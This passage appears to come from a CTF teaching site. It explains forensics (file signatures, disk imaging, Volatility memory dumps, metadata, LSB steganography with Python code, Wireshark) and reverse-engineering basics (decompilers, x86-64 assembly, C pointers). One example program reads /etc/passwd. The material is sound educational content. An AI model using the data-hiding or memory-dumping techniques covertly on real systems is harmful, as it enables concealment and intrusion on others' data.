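    'JPEG': bytes.fromhex('FFD8FF'),
    'PNG': bytes.fromhex('89504E470D0A1A0A'),
    'GIF': bytes.fromhex('47494638'),
    'PDF': bytes.fromhex('25504446'),
    'ZIP': bytes.fromhex('504B0304'),
}

def identify(header: bytes) -> str:
    # Return the first format whose signature matches the start of the data
    for name, magic in SIGNATURES.items():
        if header.startswith(magic):
            return name
    return 'unknown'

# Leading bytes from the example above
header = bytes.fromhex('FFD8FFE000104A46494600')
print(identify(header))
```

For a file on disk, read the first few bytes in binary mode (for example open(path, 'rb').read(16)) and pass them to identify.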
A hexadecimal (hex) editor (also called a binary file editor or byte editor) is a computer program you can use to manipulate the fundamental binary data that constitutes a computer file. The name \u201chex\u201d comes from \u201chexadecimal,\u201d a standard numerical format for representing binary data. A typical computer file occupies multiple areas on the platter(s) of a disk drive, whose contents are combined to form the file. Hex editors that are designed to parse and edit sector data from the physical segments of floppy or hard disks are sometimes called sector editors or disk editors. A hex editor is used to see or edit the raw, exact contents of a file. Hex editors may be used to correct data corrupted by a system or application. A list of editors can be found on the forensics Wiki. You can download one and install it on your system.
"}, {"location": "forensics/what-is-a-hex-editor/#example", "title": "Example", "text": "Open fileA.jpg in a hex editor. (Most Hex editors have either a \u201cFile > Open\u201d option or a simple drag and drop.)
When you open fileA.jpg in your hex editor, you should see something similar to this:
Your hex editor should also have a \u201cgo to\u201d or \u201cfind\u201d feature so you can jump to a specific byte.
"}, {"location": "forensics/what-is-disk-imaging/", "title": "Disk Imaging", "text": "A forensic image is an electronic copy of a drive (e.g. a hard drive, USB, etc.). It\u2019s a bit-by-\u00adbit or bitstream file that\u2019s an exact, unaltered copy of the media being duplicated.
Wikipedia said that the most straight\u00adforward disk imaging method is to read a disk from start to finish and write the data to a forensics image format. \u201cThis can be a time-consuming process, especially for disks with a large capacity,\u201d Wikipedia said.
To prevent write access to the disk, you can use a write blocker. It\u2019s also common to calculate a cryptographic hash of the entire disk when imaging it. \u201cCommonly-used cryptographic hashes are MD5, SHA1 and/or SHA256,\u201d said Wikipedia. \u201cBy recalculating the integrity hash at a later time, one can determine if the data in the disk image has been changed. This by itself provides no protection against intentional tampering, but it can indicate that the data was altered, e.g. due to corruption.\u201d
Why image a disk? Forensic imaging: - Prevents tampering with the original data evidence - Allows you to play around with the copy, without worrying about messing up the original
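Calculating the integrity hash of an image can be sketched with Python's hashlib. The function name and chunk size are our own choices, and the in-memory stream stands in for an opened image file such as open('usb.dd', 'rb'), where the file name is hypothetical.

```python
import hashlib
import io

def hash_stream(stream, algorithm='sha256', chunk_size=1024 * 1024):
    # Read the image in chunks so large disks never have to fit in memory
    digest = hashlib.new(algorithm)
    for chunk in iter(lambda: stream.read(chunk_size), b''):
        digest.update(chunk)
    return digest.hexdigest()

# Stand-in for an opened disk image
image = io.BytesIO(b'password')
print(hash_stream(image, 'md5'))
```

Recomputing the hash later and comparing it with the recorded value shows whether the image has changed.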
"}, {"location": "forensics/what-is-disk-imaging/#forensic-image-extraction-exmple", "title": "Forensic Image Extraction Exmple", "text": "This example uses the tool AccessData FTK Imager.
Step 1: Go to File > Create Disk Image
Step 2: Select Physical Drive
, because the USB or hard drive you\u2019re imaging is a physical device or drive.
Step 3: Select the drive you\u2019re imaging. The 1000 GB is my computer hard drive; the 128 MB is the USB that I want to image.
Step 4: Add a new image destination
Step 5: Select whichever image type you want. Choose Raw (dd)
if you\u2019re a beginner, since it\u2019s the most common type
Step 6: Fill in all the evidence information
Step 7: Choose where you want to store it
Step 8: The image destination has been added. Now you can start the image extraction
Step 9: Wait for the image to be extracted
Step 10: This is the completed extraction
Step 11: Add the image you just created so that you can view it
Step 12: This time, choose image file, since that\u2019s what you just created
Step 13: Enter the path of the image you just created
Step 14: View the image.
Step 15: To view files in the USB, go to Partition 1 > [USB name] > [root]
in the Evidence Tree and look in the File List
Step 16: Selecting fileA, fileB, fileC, or fileD gives us some properties of the files & a preview of each photo
Step 17: Extract files of interest for further analysis by selecting, right-clicking and choosing Export Files
There are plenty of traces of someone's activity on a computer, but perhaps some of the most valuable information can be found within memory dumps, that is, images taken of RAM. These dumps of data are often very large, but can be analyzed using a tool called Volatility.
"}, {"location": "forensics/what-is-memory-forensics/#volatility-basics", "title": "Volatility Basics", "text": "Memory forensics isn't all that complicated; the hardest part is using your toolset correctly. A good workflow is as follows:
Run strings for clues
In order to properly use Volatility you must supply a profile with --profile=PROFILE, so before any sleuthing you need to determine the profile using imageinfo:
$ python vol.py -f ~/image.raw imageinfo\nVolatility Foundation Volatility Framework 2.4\nDetermining profile based on KDBG search...\n\n Suggested Profile(s) : Win7SP0x64, Win7SP1x64, Win2008R2SP0x64, Win2008R2SP1x64\n AS Layer1 : AMD64PagedMemory (Kernel AS)\n AS Layer2 : FileAddressSpace (/Users/Michael/Desktop/win7_trial_64bit.raw)\n PAE type : PAE\n DTB : 0x187000L\n KDBG : 0xf80002803070\n Number of Processors : 1\n Image Type (Service Pack) : 0\n KPCR for CPU 0 : 0xfffff80002804d00L\n KUSER_SHARED_DATA : 0xfffff78000000000L\n Image date and time : 2012-02-22 11:29:02 UTC+0000\n Image local date and time : 2012-02-22 03:29:02 -0800\n
"}, {"location": "forensics/what-is-memory-forensics/#dump-processes", "title": "Dump Processes", "text": "In order to view processes, the pslist
or pstree
or psscan
command can be used.
$ python vol.py -f ~/image.raw --profile=Win7SP0x64 pslist\nVolatility Foundation Volatility Framework 2.5\nOffset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit\n------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------\n0xffffa0ee12532180 System 4 0 108 0 ------ 0 2018-04-22 20:02:33 UTC+0000\n0xffffa0ee1389d040 smss.exe 232 4 3 0 ------ 0 2018-04-22 20:02:33 UTC+0000\n...\n0xffffa0ee128c6780 VBoxTray.exe 3324 1123 10 0 1 0 2018-04-22 20:02:55 UTC+0000\n0xffffa0ee14108780 OneDrive.exe 1422 1123 10 0 1 1 2018-04-22 20:02:55 UTC+0000\n0xffffa0ee14ade080 svchost.exe 228 121 1 0 1 0 2018-04-22 20:14:43 UTC+0000\n0xffffa0ee1122b080 notepad.exe 2019 1123 1 0 1 0 2018-04-22 20:14:49 UTC+0000\n
"}, {"location": "forensics/what-is-memory-forensics/#process-memory-dump", "title": "Process Memory Dump", "text": "Dumping the memory of a process can prove to be fruitful. Say we want to dump the data from notepad.exe:
$ python vol.py -f ~/image.raw --profile=Win7SP0x64 memdump -p 2019 -D dump/\nVolatility Foundation Volatility Framework 2.4\n************************************************************************\nWriting System [ 2019] to 2019.dmp\n\n$ ls -alh dump/2019.dmp\n-rw-r--r-- 1 user staff 111M Apr 22 20:47 dump/2019.dmp\n
"}, {"location": "forensics/what-is-memory-forensics/#other-useful-commands", "title": "Other Useful Commands", "text": "There are plenty of commands that Volatility offers but some highlights include:
$ python vol.py -f IMAGE --profile=PROFILE connections
: view network connections
$ python vol.py -f IMAGE --profile=PROFILE cmdscan
: view commands that were run in cmd prompt
Metadata is data about data. Different types of files have different metadata. The metadata on a photo could include dates, camera information, GPS location, comments, etc. For music, it could include the title, author, track number and album.
"}, {"location": "forensics/what-is-metadata/#what-kind-of-file-metadata-is-useful", "title": "What kind of file metadata is useful?", "text": "Potentially, any file metadata you can find could be useful.
"}, {"location": "forensics/what-is-metadata/#how-do-i-find-it", "title": "How do I find it?", "text": "Note
EXIF Data is metadata attached to photos which can include location, time, and device information.
One of our favorite tools is exiftool, which displays metadata for an input file, including: - File size - Dimensions (width and height) - File type - Programs used to create (e.g. Photoshop) - OS used to create (e.g. Apple)
Run command line: exiftool(-k).exe [filename]
and you should see something like this:
Let's take a look at File A's metadata with exiftool:
File type
Image description
Make and camera info
GPS Latitude/Longitude
"}, {"location": "forensics/what-is-metadata/#timestamps", "title": "Timestamps", "text": "Timestamps are data that indicate the time of certain events (MAC): - Modification \u2013 when a file was modified - Access \u2013 when a file or entries were read or accessed - Creation \u2013 when files or entries were created
"}, {"location": "forensics/what-is-metadata/#types-of-timestamps", "title": "Types of timestamps", "text": "Certain events such as creating, moving, copying, opening, editing, etc. might affect the MAC times. If the MAC timestamps can be attained, a timeline of events could be created.
"}, {"location": "forensics/what-is-metadata/#timeline-patterns", "title": "Timeline Patterns", "text": "There are plenty more patterns than the ones introduced below, but these are the basics you should start with to get a good understanding of how it works, and to complete this challenge.
"}, {"location": "forensics/what-is-metadata/#examples", "title": "Examples", "text": "
We know that the BMP files fileA and fileD are the same, but that the JPEG files fileB and fileC are different somehow. So how can we find out what went on with these files?
By using timestamp information from the file system, we can learn that the BMP fileD was the original file, with fileA being a copy of the original. Afterward, fileB was created by modifying fileA, and fileC was created by modifying fileA in a different way.
Follow along as we demonstrate.
We\u2019ll start by analyzing images in AccessData FTK Imager, where there\u2019s a Properties window that shows you some information about the file or folder you\u2019ve selected.
Here are the extracted MAC times for fileA, fileB, fileC and fileD: Note, AccessData FTK Imager assumes that the file times on the drive are in UTC (Coordinated Universal Time). I subtracted four hours, since the USB was set up in Eastern Standard Time. This isn\u2019t necessary, but it helps me understand the times a bit better.
Highlight timestamps that are the same. If timestamps are off by a few seconds, they should be counted as the same. This lets you see a clear difference between different timestamps. Then, highlight oldest to newest to help put them in order.
Identify timestamp patterns.
"}, {"location": "forensics/what-is-stegonagraphy/", "title": "Steganography", "text": "Steganography is the practice of hiding data in plain sight. Steganography is often embedded in images or audio.
You could send a picture of a cat to a friend and hide text inside. Looking at the image, there\u2019s nothing to make anyone think there\u2019s a message hidden inside it.
You could also hide a second image inside the first.
"}, {"location": "forensics/what-is-stegonagraphy/#steganography-detection", "title": "Steganography Detection", "text": "So we can hide text and an image, how do we find out if there is hidden data?
FileA and FileD appear the same, but they\u2019re different. Also, FileD was modified after it was copied, so it\u2019s possible there might be steganography in it.
FileB and FileC don\u2019t appear to have been modified after being created. That doesn\u2019t rule out the possibility that there\u2019s steganography in them, but you\u2019re more likely to find it in fileD. This brings up two questions:
Files are made of bytes. Each byte is composed of eight bits.
Changing the least-significant bit (LSB) doesn\u2019t change the value very much.
So we can modify the LSB without changing the file noticeably. By doing so, we can hide a message inside.
"}, {"location": "forensics/what-is-stegonagraphy/#lsb-steganography-in-images", "title": "LSB Steganography in Images", "text": "LSB Steganography or Least Significant Bit Steganography is a method of Steganography where data is recorded in the lowest bit of a byte.
Say an image has a pixel with an RGB value of (255, 255, 255). The bits of each of those RGB values will look like:
1 1 1 1 1 1 1 1
By modifying the lowest, or least significant, bit, we can use the 1 bit space across every RGB value for every pixel to construct a message.
1 1 1 1 1 1 1 0
The reason steganography is hard to detect by sight is that a 1 bit difference in color is insignificant, as seen below.
"}, {"location": "forensics/what-is-stegonagraphy/#example", "title": "Example", "text": "Let\u2019s say we have an image, and part of it contains the following binary:
And let\u2019s say we want to hide the character y inside.
First, we need to convert the hidden message to binary.
Now we take each bit from the hidden message and replace the LSB of the corresponding byte with it.
And again:
And again:
And again:
And again:
And again:
And again:
And once more:
Decoding LSB steganography is exactly the same as encoding, but in reverse. For each byte, grab the LSB and add it to your decoded message. Once you\u2019ve gone through each byte, convert all the LSBs you grabbed into text or a file. (You can use your file signature knowledge here!)
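Encoding and decoding can be sketched in Python on raw bytes. The cover bytes below are made up (eight bytes of 255), and a real image would first have to be decoded into its pixel values with an imaging library; both function names are ours.

```python
def embed_bits(cover: bytes, message: bytes) -> bytes:
    # Split the message into bits, most significant bit first
    bits = [(byte >> shift) & 1 for byte in message for shift in range(7, -1, -1)]
    if len(bits) > len(cover):
        raise ValueError('cover data is too small for the message')
    stego = bytearray(cover)
    for i, bit in enumerate(bits):
        # Clear the LSB of the cover byte, then set it to the message bit
        stego[i] = (stego[i] & 0xFE) | bit
    return bytes(stego)

def extract_bits(stego: bytes, length: int) -> bytes:
    # Rebuild each message byte from the LSBs of eight consecutive bytes
    out = bytearray()
    for i in range(length):
        value = 0
        for b in stego[i * 8:(i + 1) * 8]:
            value = (value << 1) | (b & 1)
        out.append(value)
    return bytes(out)

cover = bytes([255] * 8)
stego = embed_bits(cover, b'y')
print(list(stego))
print(extract_bits(stego, 1))
```

Each cover byte changes by at most 1, which is why the result looks the same to the eye.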
"}, {"location": "forensics/what-is-stegonagraphy/#what-other-types-of-steganography-are-there", "title": "What other types of steganography are there?", "text": "Steganography is hard for the defense side, because there\u2019s practically an infinite number of ways it could be carried out. Here are a few examples: - LSB steganography: different bits, different bit combinations - Encode in every certain number of bytes - Use a password - Hide in different places - Use encryption on top of steganography
"}, {"location": "forensics/what-is-wireshark/", "title": "Wireshark", "text": "Note from our infrastructure team
\"Wireshark saved me hours on my last tax return! - David\"
\"[Wireshark] is great for ruining your weekend and fixing pesky networking problems! - Max\"
\"Wireshark is the powerhouse of the cell. - Joe\"
\"Does this cable do anything? - Ayyaz\"
Wireshark is a network protocol analyzer which is often used in CTF challenges to look at recorded network traffic. Wireshark uses a filetype called PCAP to record traffic. PCAPs are often distributed in CTF challenges to provide recorded traffic history.
"}, {"location": "forensics/what-is-wireshark/#interface", "title": "Interface", "text": "Upon opening Wireshark, you are greeted with the option to open a PCAP or begin capturing network traffic on your device.
The network traffic displayed initially shows the packets in the order in which they were captured. You can filter packets by protocol, source IP address, destination IP address, length, etc.
In order to apply filters, simply enter the constraining factor, for example 'http', in the display filter bar.
Filters can be chained together using '&&' notation. In order to filter by IP, ensure a double equals '==' is used.
The most pertinent part of a packet is its data payload and protocol information.
"}, {"location": "forensics/what-is-wireshark/#decrypting-ssl-traffic", "title": "Decrypting SSL Traffic", "text": "By default, Wireshark cannot decrypt SSL traffic on your device unless you grant it specific certificates.
"}, {"location": "forensics/what-is-wireshark/#high-level-ssl-handshake-overview", "title": "High Level SSL Handshake Overview", "text": "In order for a network session to be encrypted properly, the client and server must share a common secret for which they can use to encrypt and decrypt data without someone in the middle being able to guess. The SSL Handshake loosely follows this format:
There are several ways to be able to decrypt traffic.
Reverse Engineering in a CTF is typically the process of taking a compiled (machine code, bytecode) program and converting it back into a more human readable format.
Very often the goal of a reverse engineering challenge is to understand the functionality of a given program such that you can identify deeper issues.
Decompilers do the impossible and reverse compiled code back into pseudocode/code.
IDA offers HexRays, which translates machine code into a higher language pseudocode.
"}, {"location": "reverse-engineering/what-are-decompilers/#example-workflow", "title": "Example Workflow", "text": "Let's say we are disassembling a program which has the source code:
#include <stdio.h>\n\nvoid printSpacer(int num){\n for(int i = 0; i < num; ++i){\n printf(\"-\");\n }\n printf(\"\\n\");\n}\n\nint main()\n{\n char* string = \"Hello, World!\";\n for(int i = 0; i < 13; ++i){\n printf(\"%c\", string[i]);\n for(int j = i+1; j < 13; j++){\n printf(\"%c\", string[j]);\n }\n printf(\"\\n\");\n printSpacer(13 - i);\n }\n return 0;\n}\n
And creates an output of:
Hello, World!\n-------------\nello, World!\n------------\nllo, World!\n-----------\nlo, World!\n----------\no, World!\n---------\n, World!\n--------\n World!\n-------\nWorld!\n------\norld!\n-----\nrld!\n----\nld!\n---\nd!\n--\n!\n-\n
If we are given a binary compiled from that source and we want to figure out how the source looks, we can use a decompiler to get C pseudocode which we can then use to reconstruct the function. The sample decompilation can look like:
printSpacer:\nint __fastcall printSpacer(int a1)\n{\n int i; // [rsp+8h] [rbp-8h]\n\n for ( i = 0; i < a1; ++i )\n printf(\"-\");\n return printf(\"\\n\");\n}\n\nmain:\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n int v4; // [rsp+18h] [rbp-18h]\n signed int i; // [rsp+1Ch] [rbp-14h]\n\n for ( i = 0; i < 13; ++i )\n {\n v4 = i + 1;\n printf(\"%c\", (unsigned int)aHelloWorld[i], envp);\n while ( v4 < 13 )\n printf(\"%c\", (unsigned int)aHelloWorld[v4++]);\n printf(\"\\n\");\n printSpacer(13 - i);\n }\n return 0;\n}\n
A good method of getting a good representation of the source is to convert the decompilation into Python since Python is basically pseudocode that runs. Starting with main often allows you to gain a good overview of what the program is doing and will help you translate the other functions.
"}, {"location": "reverse-engineering/what-are-decompilers/#main", "title": "Main", "text": "We know we will start with a main function and some variables. If you trace how the variables are used, you can often determine their types. Because i is being used as an index, we know it's an int, and because v4 is used as one later on, it too is an int. We can also see a variable aHelloWorld being printed with \"%c\", so we can determine it represents the 'Hello, World!' string. Let's define all these variables in our Python main function:
def main():\n string = \"Hello, World!\"\n i = 0\n v4 = 0\n for i in range(0, 13):\n v4 = i + 1\n print(string[i], end='')\n while v4 < 13:\n print(string[v4], end='')\n v4 += 1\n print()\n printSpacer(13-i)\n
"}, {"location": "reverse-engineering/what-are-decompilers/#printspacer-function", "title": "printSpacer Function", "text": "Now we can see that printSpacer is clearly being fed an int value. Translating it into python shouldn't be too hard.
def printSpacer(number):\n i = 0\n for i in range(0, number):\n print(\"-\", end='')\n print()\n
"}, {"location": "reverse-engineering/what-are-decompilers/#results", "title": "Results", "text": "Running main() gives us:
Hello, World!\n-------------\nello, World!\n------------\nllo, World!\n-----------\nlo, World!\n----------\no, World!\n---------\n, World!\n--------\n World!\n-------\nWorld!\n------\norld!\n-----\nrld!\n----\nld!\n---\nd!\n--\n!\n-\n
"}, {"location": "reverse-engineering/what-are-disassemblers/", "title": "Disassemblers", "text": "A disassembler is a tool which translates the machine code of a compiled program into human-readable assembly.
"}, {"location": "reverse-engineering/what-are-disassemblers/#list-of-disassemblers", "title": "List of Disassemblers", "text": "The Interactive Disassembler (IDA) is the industry standard for binary disassembly. IDA is capable of disassembling \"virtually any popular file format\". This makes it very useful to security researchers and CTF players who often need to analyze obscure files without knowing what they are or where they came from. IDA also features the industry leading Hex Rays decompiler which can convert assembly code back into a pseudo code like format.
IDA also has a plugin interface which has been used to create some successful plugins that can make reverse engineering easier:
Binary Ninja is an up-and-coming disassembler that attempts to bring a new, more programmatic approach to reverse engineering. Binary Ninja brings an improved plugin API and modern features to reverse engineering. While it's neither as popular nor as old as IDA, Binary Ninja (often called binja) is quickly gaining ground and has a small community of dedicated users and followers.
Binja also has some community contributed plugins which are collected here: https://github.com/Vector35/community-plugins
"}, {"location": "reverse-engineering/what-are-disassemblers/#gdb", "title": "gdb", "text": "The GNU Debugger is a free and open source debugger which also disassembles programs. It's capable as a disassembler, but most notably it is used by CTF players for its debugging and dynamic analysis capabilities.
gdb is often used in tandem with enhancement scripts like peda, pwndbg, and GEF.
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/", "title": "Assembly/Machine Code", "text": "Machine Code or Assembly is code which has been formatted for direct execution by a CPU. Machine Code is the reason why readable programming languages like C, when compiled, cannot be reversed into source code (well Decompilers can sort of, but more on that later).
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#from-source-to-compilation", "title": "From Source to Compilation", "text": "Godbolt shows the differences in machine code generated by various compilers.
For example, if we have a simple C program:
#include <unistd.h>\n#include <stdio.h>\n#include <stdlib.h>\n\nint main() {\n char c;\n int fd = syscall(2, \"/etc/passwd\", 0);\n while (syscall(0, fd, &c, 1)) {\n putchar(c);\n }\n}\n
We can see the compilation results in some verbose instructions for the CPU:
.LC0:\n .string \"/etc/passwd\"\nmain:\n push rbp\n mov rbp, rsp\n sub rsp, 16\n mov edx, 0\n mov esi, OFFSET FLAT:.LC0\n mov edi, 2\n mov eax, 0\n call syscall\n mov DWORD PTR [rbp-4], eax\n.L3:\n lea rdx, [rbp-5]\n mov eax, DWORD PTR [rbp-4]\n mov ecx, 1\n mov esi, eax\n mov edi, 0\n mov eax, 0\n call syscall\n test rax, rax\n setne al\n test al, al\n je .L2\n movzx eax, BYTE PTR [rbp-5]\n movsx eax, al\n mov edi, eax\n call putchar\n jmp .L3\n.L2:\n mov eax, 0\n leave\n ret\n
This is a one way process for compiled languages as there is no way to generate source from machine code. While the machine code may seem unintelligible, the extremely basic functions can be interpreted with some practice.
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#x86-64", "title": "x86-64", "text": "x86-64 or amd64 or i64 is a 64-bit Complex Instruction Set Computing (CISC) architecture. This basically means that the registers used for this architecture are extended by an extra 32 bits compared to Intel's 32-bit x86 architecture. CISC means that a single instruction can do a bunch of different things at once, such as memory accesses, register reads, etc. It is also a variable-length instruction set, which means different instructions can be different sizes, ranging from 1 to 15 bytes long. And finally x86-64 allows for multi-sized register access, which means that you can access certain parts of a register which are different sizes.
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#x86-64-registers", "title": "x86-64 Registers", "text": "x86-64 registers behave similarly to other architectures. A key component of x86-64 registers is multi-sized access, which means the register RAX can have its lower 32 bits accessed with EAX. The lower 16 bits can be accessed with AX and the lowest 8 bits can be accessed with AL, which allows the compiler to make optimizations which boost program execution.
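Multi-sized access can be modeled with bit masks. The sketch below is illustrative Python rather than real register access; the sample value and the helper name sub_registers are made up for this example.

```python
def sub_registers(rax: int) -> dict:
    """Return the views of a 64-bit value that RAX, EAX, AX and AL would expose."""
    return {
        "rax": rax & 0xFFFFFFFFFFFFFFFF,  # full 64 bits
        "eax": rax & 0xFFFFFFFF,          # lower 32 bits
        "ax": rax & 0xFFFF,               # lower 16 bits
        "al": rax & 0xFF,                 # lowest 8 bits
    }


# Hypothetical register contents chosen so each byte is easy to spot.
views = sub_registers(0x1122334455667788)
for name, value in views.items():
    print(f"{name} = {value:#x}")
```

Each smaller name is just a narrower window onto the same underlying value.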
x86-64 has plenty of registers to use, including rax, rbx, rcx, rdx, rdi, rsi, rsp, rip, r8-r15, and more! But some registers serve special purposes.
The special registers include: - RIP: the instruction pointer - RSP: the stack pointer - RBP: the base pointer
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#instructions", "title": "Instructions", "text": "An instruction represents a single operation for the CPU to perform.
There are different types of instructions including:
mov rax, [rsp - 0x40]
add rbx, rcx
jne 0x8000400
Because x86-64 is a CISC architecture, instructions can be quite complex for machine code, such as repne scasb
which repeats up to ECX times over memory at EDI looking for a NULL byte (0x00), decrementing ECX each byte (essentially strlen() in a single instruction!).
It is important to remember that an instruction really is just memory; this idea will become useful with Return Oriented Programming or ROP.
Note
Instructions, numbers, strings: everything is stored as bytes, which are conventionally written in hex!
add rax, rbx == 48 01 d8\nmov rax, 0xdeadbeef == 48 c7 c0 ef be ad de\nmov rax, [0xdeadbeef] == 67 48 8b 05 ef be ad de\n\"Hello\" == 48 65 6c 6c 6f\n
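Two of the byte sequences in the note can be checked with a few lines of Python. This is only a sketch of the data encodings (ASCII text and a little-endian 32-bit value); it does not assemble instructions, and the variable names are arbitrary.

```python
import struct

# ASCII text is stored one byte per character.
hello_bytes = "Hello".encode("ascii").hex(" ")

# x86-64 is little-endian, so the 32-bit value 0xdeadbeef is stored
# least-significant byte first. That is why "ef be ad de" appears at the
# end of the encoded mov instructions.
imm_bytes = struct.pack("<I", 0xDEADBEEF).hex(" ")

print(hello_bytes)  # 48 65 6c 6c 6f
print(imm_bytes)    # ef be ad de
```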
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#execution", "title": "Execution", "text": "What should the CPU execute? This is determined by the RIP register where IP means instruction pointer. Execution follows the pattern: fetch the instruction at the address in RIP, decode it, run it.
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#examples", "title": "Examples", "text": "mov rax, 0xdeadbeef
Here the operation mov
is moving the \"immediate\" 0xdeadbeef
into the register RAX
mov rax, [0xdeadbeef + rbx * 4]
Here the operation mov
is moving the data at the address of [0xdeadbeef + RBX*4]
into the register RAX
. When brackets are used, you can think of the program as getting the content from that effective address.
-> 0x0804000: mov eax, 0xdeadbeef Register Values:\n 0x0804005: mov ebx, 0x1234 RIP = 0x0804000\n 0x080400a: add rax, rbx RAX = 0x0\n 0x080400d: inc rbx RBX = 0x0\n 0x0804010: sub rax, rbx RCX = 0x0\n 0x0804013: mov rcx, rax RDX = 0x0\n
0x0804000: mov eax, 0xdeadbeef Register Values:\n-> 0x0804005: mov ebx, 0x1234 RIP = 0x0804005\n 0x080400a: add rax, rbx RAX = 0xdeadbeef\n 0x080400d: inc rbx RBX = 0x0\n 0x0804010: sub rax, rbx RCX = 0x0\n 0x0804013: mov rcx, rax RDX = 0x0\n
0x0804000: mov eax, 0xdeadbeef Register Values:\n 0x0804005: mov ebx, 0x1234 RIP = 0x080400a\n-> 0x080400a: add rax, rbx RAX = 0xdeadbeef\n 0x080400d: inc rbx RBX = 0x1234\n 0x0804010: sub rax, rbx RCX = 0x0\n 0x0804013: mov rcx, rax RDX = 0x0\n
0x0804000: mov eax, 0xdeadbeef Register Values:\n 0x0804005: mov ebx, 0x1234 RIP = 0x080400d\n 0x080400a: add rax, rbx RAX = 0xdeadd123\n-> 0x080400d: inc rbx RBX = 0x1234\n 0x0804010: sub rax, rbx RCX = 0x0\n 0x0804013: mov rcx, rax RDX = 0x0\n
0x0804000: mov eax, 0xdeadbeef Register Values:\n 0x0804005: mov ebx, 0x1234 RIP = 0x0804010\n 0x080400a: add rax, rbx RAX = 0xdeadd123\n 0x080400d: inc rbx RBX = 0x1235\n-> 0x0804010: sub rax, rbx RCX = 0x0\n 0x0804013: mov rcx, rax RDX = 0x0\n
0x0804000: mov eax, 0xdeadbeef Register Values:\n 0x0804005: mov ebx, 0x1234 RIP = 0x0804013\n 0x080400a: add rax, rbx RAX = 0xdeadbeee\n 0x080400d: inc rbx RBX = 0x1235\n 0x0804010: sub rax, rbx RCX = 0x0\n-> 0x0804013: mov rcx, rax RDX = 0x0\n
0x0804000: mov eax, 0xdeadbeef Register Values:\n 0x0804005: mov ebx, 0x1234 RIP = 0x0804016\n 0x080400a: add rax, rbx RAX = 0xdeadbeee\n 0x080400d: inc rbx RBX = 0x1235\n 0x0804010: sub rax, rbx RCX = 0xdeadbeee\n 0x0804013: mov rcx, rax RDX = 0x0\n
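The register values in the trace above can be reproduced with a tiny simulation. This is a rough sketch in Python, not an emulator: it only models the six instructions shown, ignores RIP and the flags, and the names MASK64, regs, program and trace are invented for the example.

```python
MASK64 = 0xFFFFFFFFFFFFFFFF  # results wrap around at 64 bits

regs = {"rax": 0, "rbx": 0, "rcx": 0, "rdx": 0}

# Each entry pairs an instruction from the trace with its effect on regs.
# Writing a 32-bit register (eax, ebx) zero-extends into the 64-bit one.
program = [
    ("mov eax, 0xdeadbeef", lambda r: r.update(rax=0xDEADBEEF)),
    ("mov ebx, 0x1234", lambda r: r.update(rbx=0x1234)),
    ("add rax, rbx", lambda r: r.update(rax=(r["rax"] + r["rbx"]) & MASK64)),
    ("inc rbx", lambda r: r.update(rbx=(r["rbx"] + 1) & MASK64)),
    ("sub rax, rbx", lambda r: r.update(rax=(r["rax"] - r["rbx"]) & MASK64)),
    ("mov rcx, rax", lambda r: r.update(rcx=r["rax"])),
]

trace = []
for text, execute in program:
    execute(regs)
    trace.append((text, dict(regs)))  # snapshot after each instruction
    print(f"{text:<22} RAX={regs['rax']:#x} RBX={regs['rbx']:#x} RCX={regs['rcx']:#x}")
```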
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#control-flow", "title": "Control Flow", "text": "How can we express conditionals in x86-64? We use conditional jumps such as:
jnz <address>
je <address>
jge <address>
jle <address>
They jump if their condition is true, and just go to the next instruction otherwise. These conditionals check RFLAGS (EFLAGS on 32-bit x86), a special register which stores flags set by certain instructions such as add rax, rbx
which sets the o (overflow) flag if the signed result is too large for a 64-bit register to hold and wraps around. You can jump based on that with a jo
instruction. The most important thing to remember is the cmp instruction:
cmp rax, rbx\njle error\n
This assembly jumps if RAX <= RBX"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#addresses", "title": "Addresses", "text": "Memory acts similarly to a big array where the indices of this \"array\" are memory addresses. Remember from earlier:
mov rax, [0xdeadbeef]
The square brackets mean \"get the data at this address\". This is analogous to the C/C++ syntax: rax = *0xdeadbeef;
The C programming language was written by Dennis Ritchie in the 1970s while he was working at Bell Labs. It was first used to reimplement the Unix operating system which was purely written in assembly language. At first, the Unix developers were considering using a language called \"B\" but because B wasn't optimized for the target computer, the C language was created.
Note
C is the letter and the programming language after B!
C was designed to be close to assembly and is still widely used in lower level programming where speed and control are needed (operating systems, embedded systems). C was also very influential to other programming languages used today. Notable languages include C++, Objective-C, Golang, Java, JavaScript, PHP, Python, and Rust.
"}, {"location": "reverse-engineering/what-is-c/#hello-world", "title": "Hello World", "text": "C is an ancestor of many other programming languages and if you are familiar with programming, it's likely that C will be at least somewhat familiar.
#include <stdio.h>\nint main()\n{\n printf(\"Hello, World!\");\n return 0;\n}\n
"}, {"location": "reverse-engineering/what-is-c/#today", "title": "Today", "text": "Today C is widely used either as a low level programming language or is the base language that other programming languages are implemented in.
While it can be difficult to see, the C language compiles down directly into machine code. The compiler is programmed to process the provided C code and emit assembly that's targeted to whatever operating system and architecture the compiler is set to use.
Some common compilers include:
A good way to explore this relationship is to use this online GCC Explorer from Matt Godbolt.
With regard to CTFs, many reverse engineering and exploitation challenges are written in C because the language compiles down directly to assembly and there are few to no safeguards in the language. This means developers must manually handle details such as memory management. Of course, this can lead to mistakes which can sometimes lead to security issues.
Note
Other higher level languages like Python manage memory and garbage collection for you. Google's Go was inspired by C, but adds in functionality like garbage collection and memory safety.
There are some examples of famously vulnerable functions in C which are still available and can still result in vulnerabilities:
gets - Can result in buffer overflows
strcpy - Can result in buffer overflows
strcat - Can result in buffer overflows
strcmp - Can result in timing attacks
C has four basic types:
C uses an idea known as pointers. A pointer is a variable which contains the address of another variable.
To understand this idea we should first understand that memory is laid out in terms of addresses and data gets stored at these addresses.
Take the following example of defining an integer in C:
int x = 4;\n
To the programmer this is the variable x receiving the value of 4. The computer stores this value in some location in memory. For example we can say that address 0x1000 now holds the value 4. The computer knows to directly access the memory and retrieve the value 4 whenever the programmer tries to use the x variable. If we were to say x + 4, the computer would give you 8 instead of 0x1004.
But in C we can retrieve the memory address being used to hold the 4 value (i.e. 0x1000) by using the & character and using * to create an \"integer pointer\" type.
int* y = &x;\n
